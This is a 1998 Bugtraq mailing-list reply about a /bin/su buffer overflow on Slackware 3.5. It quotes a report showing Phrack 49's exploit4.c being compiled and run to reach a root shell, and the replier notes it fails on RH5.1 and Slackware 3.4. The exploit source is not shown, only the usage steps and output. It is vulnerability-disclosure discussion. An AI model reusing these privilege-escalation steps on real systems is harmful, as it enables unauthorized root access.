[7697] in bugtraq
Re: slackware-3.5 /bin/su buffer overflow
daemon@ATHENA.MIT.EDU (Rick Franchuk)
Tue Aug 18 12:16:41 1998
Date: Tue, 18 Aug 1998 08:48:02 -0700
Reply-To: rickf@TRANSPECT.NET
From: Rick Franchuk <rickf@TRANSPECT.NET>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.GSO.4.02A.9808181728090.3045-200000@Chaokhun.kmitl.ac.th>
On Tue, 18 Aug 1998, Chatchai Watchakit wrote:
> >From exploit4.c of Phrack 49 (P49-14) can exploit /bin/su of slackware-3.5
> kernel 2.0.34
>
> ---------------------
>
> endeavor:~$ gcc -o exploit4 exploit4.c
> endeavor:~$ ./exploit4
> Using address: 0xbffffb20
> bash$ /bin/su $RET
> bash#
>
> ---------------------
Tested on RH5.1 and Slackware 3.4, neither appear to be vulnerable to this
script as-is.
--
__________________________________________
| |
| Rick Franchuk - TranSpecT Consulting |
|_______ _______|
\mailto:rickf@transpect.net/
\_____ICQ_#_4435025______/
